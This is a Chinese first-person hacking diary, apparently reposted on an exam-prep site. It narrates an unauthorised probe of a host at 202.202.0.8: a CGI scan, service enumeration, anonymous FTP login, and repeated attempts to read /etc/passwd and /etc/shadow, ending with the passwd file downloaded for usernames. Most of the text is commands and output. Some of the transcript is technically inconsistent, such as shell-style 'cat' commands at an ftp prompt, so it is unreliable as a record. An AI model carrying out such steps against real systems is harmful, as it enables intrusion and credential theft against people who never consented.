可恶!今天火气真差!一个没猜到。:-( 用messala扫描一下看有没有CGI漏洞:(略去复杂的扫描过程)…… 结果是滴水不漏!:-( 这个鸟管理员还挺勤快的…… 只好用nss看看它开了什么服务吧!……还好,telnet、ftp和finger的端口都打开了!^_^ 先看看有没有匿名ftp账户:
bash$ ftp 202.202.0.8
Connected to 202.202.0.8…
220 Cool FTP server(Version xxx Tue Dec 8 12:42:10 CDT 2001) ready.
Name(202.202.0.8:FakeName):anonymous
331 Guest login ok,send you complete e-mail address as password.
Password:
230:Welcome,archive user!
……
……
……
ftp>
还行,匿名ftp服务没有关,竟然可以用anonymous账户进来了!赶紧抓他的passwd:
ftp>ls
……
bin boot etc dev home lib usr proc lost found root sbin src tmp usr var
……
ftp>cd /etc
……
ftp>ls *passwd*
……
passwd passwd-
……
不会如此简单吧?看一看?:
ftp>cat passwd|more
……
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
telnet:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
ftp:60001:60001:Ftp:/:
noaccess:x:60002:60002:No Access User:/:
nobody:x:65534:65534:SunOS 4.x Nobody:/:
dennis:x:1005:20::/export/home/dennis:/bin/sh
walter:x:1001:100::/export/home/walter:/bin/sh
power:x:9589:101::/export/home/power:/bin/sh
deal:x:1035:20::/export/home/deal:/bin/sh
jessica:x:3000:300:Agent Client 1:/export/home/jessica:/bin/sh
smith:x:3001:300:Agent Client 2:/export/home/smith:/bin/sh
render:x:9591:101::/export/home/render:/bin/sh
……
倒霉,是个空的passwd!看看备份:
ftp>cat passwd-|more
……
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
telnet:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
ftp:60001:60001:Ftp:/:
noaccess:x:60002:60002:No Access User:/:
nobody :x:65534:65534:SunOS 4.x Nobody:/:
dennis:x:1005:20::/export/home/dennis:/bin/sh
walter:x:1001:100::/export/home/walter:/bin/sh
power:x:9589:101::/export/home/power:/bin/sh
deal:x:1035:20::/export/home/deal:/bin/sh
jessica:x:3000:300:Agent Client 1:/export/home/jessica:/bin/sh
smith:x:3001:300:Agent Client 2:/export/home/smith:/bin/sh
render:x:9591:101::/export/home/render:/bin/sh
……
没救了,一样的!查查看有没有shadow文件:
ftp>ls *shadow*
……
shadow shadow-
……
哈哈,一般passwd是空的,那么密码就在shadow中!
ftp>cat shadow|more
……
[sh$ cat shadow|more]: Permission denied
……
可恶,看都不让看,试试备份文件:
ftp>cat shadow-|more
……
[sh$ cat shadow-|more]: Permission denied
……
都一样--不让看!Faint! 只好可怜惜惜地把空passwd抓回来--有几个用户名总比没有强吧?
ftp>get passwd
226 Transfer complete.
540 bytes received in 0.55 seconds (1.8Kbytes/s)
ftp>bye
221 Goodbye.
bash$
考试大温馨提示:本内容来源于网络,仅代表作者个人观点,与本站立场无关,仅供您学习交流使用。其中可能有部分文章经过多次转载而造成文章内容缺失、错误或文章作者不详等问题,请您谅解。如有侵犯您的权利,请联系我们,本站会立即予以处理。
编辑特别推荐:
linuxln命令详解
nginx关于服务静态文件的配置
使用expect实现ssh自动交互